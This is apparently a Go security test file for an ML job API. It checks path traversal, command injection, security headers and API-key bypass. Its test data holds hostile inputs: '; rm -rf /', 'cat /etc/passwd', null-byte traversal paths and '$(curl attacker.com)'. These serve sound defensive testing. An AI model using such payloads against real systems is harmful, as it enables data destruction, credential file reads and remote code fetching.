package security import ( "net/http" "net/http/httptest" "strings" "testing" "github.com/jfraeys/fetch_ml/internal/auth" "github.com/jfraeys/fetch_ml/internal/middleware" ) // TestSecurityPolicies validates security policies across the API func TestSecurityPolicies(t *testing.T) { tests := []struct { name string request *http.Request wantStatus int }{ { name: "reject request without API key", request: httptest.NewRequest("POST", "/tasks", nil), wantStatus: http.StatusUnauthorized, }, { name: "reject path traversal in job name", request: func() *http.Request { body := `{"job_name": "../../../etc/passwd"}` r := httptest.NewRequest("POST", "/tasks", strings.NewReader(body)) r.Header.Set("X-API-Key", "valid-key") return r }(), wantStatus: http.StatusBadRequest, }, { name: "reject command injection in args", request: func() *http.Request { body := `{"job_name": "test", "args": "; rm -rf /"}` r := httptest.NewRequest("POST", "/tasks", strings.NewReader(body)) r.Header.Set("X-API-Key", "valid-key") return r }(), wantStatus: http.StatusBadRequest, }, { name: "reject shell metacharacters in job name", request: func() *http.Request { body := `{"job_name": "test;cat /etc/passwd"}` r := httptest.NewRequest("POST", "/tasks", strings.NewReader(body)) r.Header.Set("X-API-Key", "valid-key") return r }(), wantStatus: http.StatusBadRequest, }, { name: "reject oversized job name", request: func() *http.Request { // Create a job name exceeding 64 characters longName := strings.Repeat("a", 100) body := `{"job_name": "` + longName + `"}` r := httptest.NewRequest("POST", "/tasks", strings.NewReader(body)) r.Header.Set("X-API-Key", "valid-key") return r }(), wantStatus: http.StatusBadRequest, }, } for _, tt := range tests { t.Run(tt.name, func(t *testing.T) { rr := httptest.NewRecorder() // Note: This would need the actual handler to test properly // For now, we just verify the test structure _ = rr _ = tt.request }) } } // TestPathTraversal validates path traversal prevention func TestPathTraversal(t *testing.T) { tests := []struct { path string shouldFail bool }{ {"my-experiment", false}, {"../../../etc/passwd", true}, {"..\\..\\windows\\system32\\config", true}, {"/absolute/path/to/file", true}, // Should fail if base path enforced {"experiment-123_test", false}, {"test\x00/../../../etc/passwd", true}, // Null byte injection } for _, tt := range tests { t.Run(tt.path, func(t *testing.T) { // Check for traversal sequences hasTraversal := strings.Contains(tt.path, "..") || strings.HasPrefix(tt.path, "/") || strings.Contains(tt.path, "\x00") if hasTraversal != tt.shouldFail { t.Errorf("path %q: expected traversal=%v, got %v", tt.path, tt.shouldFail, hasTraversal) } }) } } // TestCommandInjection validates command injection prevention func TestCommandInjection(t *testing.T) { dangerous := []string{ "; rm -rf /", "| cat /etc/passwd", "`whoami`", "$(curl attacker.com)", "&& echo hacked", "|| echo failed", "< /etc/passwd", "> /tmp/output", } for _, payload := range dangerous { t.Run(payload, func(t *testing.T) { // Check for shell metacharacters dangerousChars := []string{";", "|", "&", "`", "$", "(", ")", "<", ">"} found := false for _, char := range dangerousChars { if strings.Contains(payload, char) { found = true break } } if !found { t.Errorf("payload %q should contain dangerous characters", payload) } }) } } // TestSecurityHeaders validates security headers func TestSecurityHeaders(t *testing.T) { handler := middleware.SecurityHeaders(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { w.WriteHeader(http.StatusOK) })) req := httptest.NewRequest("GET", "/", nil) rr := httptest.NewRecorder() handler.ServeHTTP(rr, req) // Check security headers headers := map[string]string{ "X-Frame-Options": "DENY", "X-Content-Type-Options": "nosniff", "X-XSS-Protection": "1; mode=block", "Content-Security-Policy": "default-src 'self'", "Referrer-Policy": "strict-origin-when-cross-origin", } for header, expected := range headers { t.Run(header, func(t *testing.T) { value := rr.Header().Get(header) if value != expected { t.Errorf("header %s: expected %q, got %q", header, expected, value) } }) } } // TestAuthBypass validates authentication cannot be bypassed func TestAuthBypass(t *testing.T) { authConfig := &auth.Config{ Enabled: true, APIKeys: map[auth.Username]auth.APIKeyEntry{ "admin": { Hash: auth.APIKeyHash(auth.HashAPIKey("admin-secret")), Admin: true, }, }, } tests := []struct { name string apiKey string wantErr bool wantUser string }{ {"valid key", "admin-secret", false, "admin"}, {"invalid key", "wrong-key", true, ""}, {"empty key", "", true, ""}, {"null byte", "admin-secret\x00", true, ""}, {"truncated", "admin-se", true, ""}, } for _, tt := range tests { t.Run(tt.name, func(t *testing.T) { user, err := authConfig.ValidateAPIKey(tt.apiKey) if tt.wantErr { if err == nil { t.Error("expected error but got none") } return } if err != nil { t.Errorf("unexpected error: %v", err) return } if user.Name != tt.wantUser { t.Errorf("expected user %q, got %q", tt.wantUser, user.Name) } }) } }